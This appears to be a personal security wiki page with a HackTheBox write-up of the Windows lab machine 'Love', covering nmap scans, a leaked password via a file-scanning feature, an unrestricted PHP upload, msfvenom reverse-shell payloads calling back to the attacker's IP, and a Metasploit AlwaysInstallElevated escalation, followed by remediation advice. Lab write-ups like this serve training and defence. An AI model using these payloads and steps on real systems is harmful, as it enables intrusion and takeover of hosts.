130n@calvinlai.com
  • About Calvin Lai (fkclai)
  • My Work
  • Information Security Centre (ISC)
    • Why we need a ISC
    • ISC Team Structure: Roles, Functions, and Tools
      • Key Function & Role
      • Tools
      • People
      • Outsource Strategy
    • HRMC Executive Paper
  • Application Security
    • Secure Coding Principles
    • HTTP Header Security Principles
    • Mitigating Broken Object Level Authorization (BOLA)
    • Spring Boot Validation
    • Output Encoding in JavaServer Faces (JSF)
    • Session Management Security Issues
    • Common API Security Problems
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources & Rate Limiting
      • Broken Function Level Authorization
      • Unsafe Consumption of APIs
    • JAVA Exception Handling
    • File Upload Validation
    • OAuth 2.0 Security
      • Insecure Storage of Access Tokens
    • Microservice Security
      • Sample Coding Demo
        • Service Implementation
        • Client Interaction
      • Security Solution for Microservices Architecture
    • Modifying and Protecting Java Class Files
      • Modify a Class File Inside a WAR File
      • Direct Bytecode Editing
        • Steps to Directly Edit a Java Class File
      • Techniques to Protect Java Class Files
        • Runtime Decryption in WebLogic
    • JAVA Program
      • Secure, Concurrent Web Access Using Java and Tor
      • Creating a Maven Java project in Visual Studio Code
  • Exploit/CVE PoC
    • ZeroLogon Exploit
    • Remote Retrieved Chrome saved Encrypted Password
    • Twitter Control an RCE attack
  • Hacking Report (HTB)
    • Hits & Summary
      • Tools & Cheat Sheet
    • Windows Machine
      • Love 10.10.10.239
      • Blackfield 10.10.10.192
      • Remote 10.10.10.180
      • Sauna 10.10.10.175
      • Forest 10.10.10.161
      • Sniper
      • Json
      • Heist
      • Blue
      • Legacy
      • Resolute
      • Cascade
    • Linux Machine
      • Photobomb 10.10.11.182
      • Pandora 10.10.11.136
      • BountyHunter 10.10.11.100
      • CAP 10.10.10.245
      • Spectra 10.10.10.229
      • Ready 10.10.10.220
      • Doctor 10.10.10.209
      • Bucket 10.10.10.212
      • Blunder 10.10.10.191
      • Registry 10.10.10.159
      • Magic
      • Tabby
  • Penetration Testing
    • Web Application PenTest
    • Network/System PenTest
    • Mobile Penetration Test
      • Certificate Pinning
        • Certificate Pinning Bypass (Android)
          • Root a Android Device
          • Setup Proxy Tool - Burp Suite
      • Checklist
  • Threat Intelligence
    • Advanced Persistent Threat (APT) groups
      • North Korean APT Groups
      • Chinese APT Groups
      • Russian APT Groups
      • Other APT
  • Red Team (Windows)
    • 01 Reconnaissance
    • 02 Privileges Escalation
    • 03 Lateral Movement
    • 04 AD Attacks
      • DCSync
    • 05 Bypass-Evasion
    • 06 Kerberos Attack
    • 99 Basic Command
  • Exploitation Guide
    • 01 Reconnaissance
    • 02 Port Enumeration
    • 03 Web Enumeration
    • 04 Windows Enum & Exploit
      • Windows Credential Dumping
        • Credential Dumping: SAM
        • Credential Dumping: DCSync
      • Kerberos Attack
      • RDP
    • 05 File Enumeration
    • 06 Reverse Shell Cheat Sheet
      • Windows Reverse Shell
      • Linux Reverse Shell
    • 07 SQL Injection
    • 08 BruteForce
    • 09 XSS Bypass Checklist
    • 10 Spring Boot
    • 11 WPA
    • 12 Payload list
  • Vuln Hub (Writeup)
    • MrRobot
    • CYBERRY
    • MATRIX 1
    • Node-1
    • DPwwn-1
    • DC7
    • AiWeb-2
    • AiWeb-1
    • BrainPan
  • CTF (Writeup & Tips)
    • CTF Tools & Tips
    • Hacker One
    • CTF Learn
    • P.W.N. University - CTF 2018
    • HITCON
    • Pwnable
      • 01 Start
  • Useful Command/Tools
    • Kali
    • Windows
    • Linux
  • Offensive Security Lab & Exam
    • Lab
    • Tools for an Offensive Certification
      • Strategy for an Offensive Exam Certification
        • CVEs
        • Privilege Escalation
        • Commands
        • Impacket
  • ISO 27001
    • Disclaimer
    • What is ISO 27001
      • Implementation
    • Documentation
    • Common Mistake
    • Q&A
      • Can internal audit to replace the risk assessment
      • Is it sufficient for only the IT department head to support the ISO 27001 program
      • Does the Business Continuity Plan (BCP) and a Disaster Recovery Plan (DRP) are the same?
    • ISO 27001 Controls and Domains
      • 1. Information Security Policies
      • 2. Organization of Information Security
      • 3. Human Resource Security
      • 4. Asset Management
      • 5. Access Control
      • 6. Cryptographic Controls
      • 7. Physical and Environmental Security
      • 8: Operational Security
      • 9. Communications Security
      • 10. System Acquisition, Development, and Maintenance
      • 11. Supplier Relationships
      • 12: Information Security Incident Management
      • 13. Information Security Aspects of Business Continuity Management
      • 14. Compliance
Powered by GitBook
On this page
  • Background
  • Hacking Process Part 0 – Service Scanning
  • Quick Pre-searching
  • Hacking Process Part 1 – Enumeration
  • Web Enumeration
  • Hacking Process Part 2 – Initial Low Privilege Access
  • Hacking Process Part 3 – Privilege Escalation
  • Exploit using Metasploit Framework
  • Post Exploitation
  • Recommendation
  • Reference Links

Was this helpful?

  1. Hacking Report (HTB)
  2. Windows Machine

Love 10.10.10.239

You could claim that anything's real if the only basis for believing in it is that nobody's proved it doesn't exist! <J.K. Rowling>

PreviousWindows MachineNextBlackfield 10.10.10.192

Last updated 3 years ago

Was this helpful?

Background

Love is a Windows machine from HackTheBox that focuses on the enumeration technique for training your ethical hacking skills and penetration testing skills.

One of the system function allows the hacker to read the file content of the provided website that I can obtain the system login credential with administrative rights. After login to the application, the file upload function does not enforce the input validation checking, the exploitable script file can upload to the server and run to obtain the initial foothold.

No anti-virus software installed on this Windows machine, I can run the privilege escalation script without restriction and find an AlwaysInstallEvevated loophole. The administrative rights access obtained and read the secure flag.

130n@calvinlai.com

Target Machine: 10.10.10.239

Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

  1. nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap

  2. nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.239 -o nmap-result.txt

# Nmap 7.80 scan initiated Mon May 24 23:38:44 2021 as: nmap -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670, -sC -sV -o nmap-result.txt 10.10.10.239
Nmap scan report for staging.love.htb (10.10.10.239)
Host is up (0.36s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Secure file scanner
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-05-24T16:08:18+00:00; +26m29s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h11m29s, deviation: 3h30m01s, median: 26m28s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-24T09:08:00-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-24T16:08:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 24 23:41:50 2021 -- 1 IP address (1 host up) scanned in 186.41 seconds

Enumeration strategies According to the Nmap result, the target machine is a Windows 10 Pro PC. It is a standard PC that installed the Apache Server. The interesting ports are two Apache port 80 and 5000. Apache is the primary enumeration target.

Hacking Process Part 1 – Enumeration

Web Enumeration

According to the Nmap result, the host's name below will be added to the host table and point to the IP 10.10.10.239.

  1. SSL-cert : staging.love.htb

  2. IIS host: www.love.htb

As no user-id found, the brute-force attack does not work on the Voting System. In addition, no product information or vulnerability was found on this website. I move the checking to the staging.love.htb.

One of the functions provided by this website is scanning the content of files. Due to access restriction of the outside host, after several tries, a password is returned by submitting the localhost address with the port 5000 that is one of the opened port at the Apache server.

Using this captured password to log in to the website www.love.htb but failure. After reviewing the dirb's result, another administrative page can be login with this password.

dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result

Hacking Process Part 2 – Initial Low Privilege Access

Reviewed the website, this PHP website provides an upload function that can upload any kinds of file without input validation, and the uploaded file can access at http://10.10.10.239/images/.

Uploaded a PHP file that helping to navigate the system. The user flag found at a file saved on the phoebe desktop. A revered shell script was prepared and uploaded to the server. 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.12.3 LPORT=1234 -f exe -o fkclai.exe

A reversed TCP shell obtained, and the user flag found at the user's desktop.

Hacking Process Part 3 – Privilege Escalation

The Privilege Escalation (PE) enumeration for the windows environment can use the tool winPEASx86.exe. This WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained in book.hacktricks.xyz

The result shows that this windows environment can exploit by the AlwaysInstallEvevated. This vulnerability allows a hacker to add the current login user to load the administrative group.

Exploit using Metasploit Framework

Prepared a reverse shell script and uploaded it to the server.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe -o msf-fkclai.exe

Started the msfconsole and set the payload to the windows/meterpreter/reverse_tcp

Executed the uploaded script to obtain the low privilege shell

Use the exploit payload exploit/windows/local/always_install_elevated and set the following parameters.

msf5> use exploit/windows/local/always_install_elevated
msf5 exploit(always_install_elevated) > set session 1
msf5 exploit(always_install_elevated) > set LHOST 10.10.14.3
msf5 exploit(always_install_elevated) > set LPORT 1234
msf5 exploit(always_install_elevated) > exploit

Exploited and got the administrative privilege access account.

Post Exploitation

    Hostname: Love
    ProductName: Windows 10 Enterprise
    EditionID: Enterprise
    ReleaseId: 2009
    BuildBranch: vb_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: x86
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-08:00) Pacific Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 5/30/2021 7:19:23 AM
    HighIntegrity: False
    PartOfDomain: False
    Hotfixes: KB4601554, KB4562830, KB4570334, KB4577586, KB4580325, KB4586864, KB4589212, KB5000802, KB5000858,

Recommendation

Missing the input validation is the major reason to obtain the initial foothold that I can upload any kinds of exploitable scripts and run them on the server. I would like to suggest the following actions to improve the security

  1. Restrict the access of internal files, especially the file that contains the system password.

  2. Improve the input validation to prevent any non-image format file upload.

  3. Enforce the system hardening to prevent any type of the Windows privilege escalation

Reference Links

Completed on 30 May 2021
LogoWindows Privilege Escalation (AlwaysInstallElevated) - Hacking ArticlesHacking Articles
LogoWindows Privilege Escalation (AlwaysInstallElevated) - Hacking ArticlesHacking Articles